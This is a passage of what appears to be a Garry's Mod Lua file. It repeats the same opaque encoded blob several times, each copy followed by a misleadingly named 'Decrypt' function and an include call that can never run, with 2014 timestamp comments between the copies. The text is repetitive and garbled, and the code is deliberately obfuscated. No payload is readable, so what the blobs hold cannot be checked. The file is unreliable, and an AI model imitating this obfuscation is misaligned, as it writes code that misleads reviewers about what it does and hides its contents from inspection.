/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
